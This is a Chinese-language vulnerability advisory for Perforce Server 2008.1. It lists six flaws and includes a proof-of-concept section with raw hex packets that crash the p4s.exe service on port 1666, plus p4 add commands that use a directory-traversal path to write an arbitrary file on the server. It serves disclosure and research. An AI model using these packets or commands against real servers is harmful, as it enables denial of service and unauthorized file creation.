Perforce Server多个远程安全漏洞

受影响系统:

Perforce Software Perforce Server 2008.1/160022

描述:

Perforce软件配置管理系统是客户端/服务器架构的SCM工具,用户可通过Perforce客户端软件访问其服务端。

Perforce Server中的多个安全漏洞可能允许远程用户导致拒绝服务或绕过某些安全限制执行非授权操作。

1) 远程用户可以通过向监听在1666/TCP端口上的p4s.exe服务发送以0x4c、0xb3、0xff、0xff和0xff字节序列开始的特制报文导致拒绝服务。

2) 远程用户可以通过向监听在1666/TCP端口上的p4s.exe服务发送客户端版本号之前包含有0xdc、0xff、0xff和0xff字节序列的特制报文导致拒绝服务。

3) 远程用户可通过向Perforce Server中的FTP服务器组件提交特制MKD命令触发空指针引用,导致拒绝服务。

4) 通过认证的用户可通过提交包含有目录遍历序列的p4 add命令执行目录遍历攻击,在服务器上创建任意文件。

5) trigger功能允许拥有超级用户权限的已认证远程用户结合trigger脚本使用p4 client命令执行任意操作系统命令。

6) 当保护表为空时,Perforce Server允许通过认证的远程用户通过p4 protect命令获得超级用户权限。

<*来源:Intevydis
  
  链接:
http://secunia.com/advisories/38816/
        http://lists.immunitysec.com/pipermail/dailydave/2010-March/006063.html
*>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

s="\x4c\xb3\xff\xff\xff\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"
s="\x1b\x1b\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\xdc\xff\xff\xff\x36\x33\x00"
s="\x4c\x4c\x00\x00\x00\x63\x6d\x70\x66\x69\x6c\x65\x00\x00\x00\x00"
s+="\x00\x00\x63\x6c\x69\x65\x6e\x74\x00\x02\x00\x00\x00\x36\x33\x00"
s+="\x61\x70\x69\x00\x0c\xff\xff\xff\x39\x39\x39\x39\x39\x00\x73\x6e"
s+="\x64\x62\x75\x66\x00\x05\x00\x00\x00\x36\x35\x35\x33\x36\x00\x66"
s+="\x75\x6e\x63\x00\x08\x00\x00\x00\x70\x72\x6f\x74\x6f\x63\x6f\x6c"
s+="\x00"

$ echo TESTTEST > "..\\..\\..\\..\\..\\..\\..\\test.txt"
$ p4 add "..\\..\\..\\..\\..\\..\\..\\test.txt"
//depot/..\..\..\..\..\..\..\test.txt#1 – opened for add
$ p4 submit

建议:

厂商补丁:

Perforce Software
—————–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.perforce.com/

发表评论?

0 条评论。

发表评论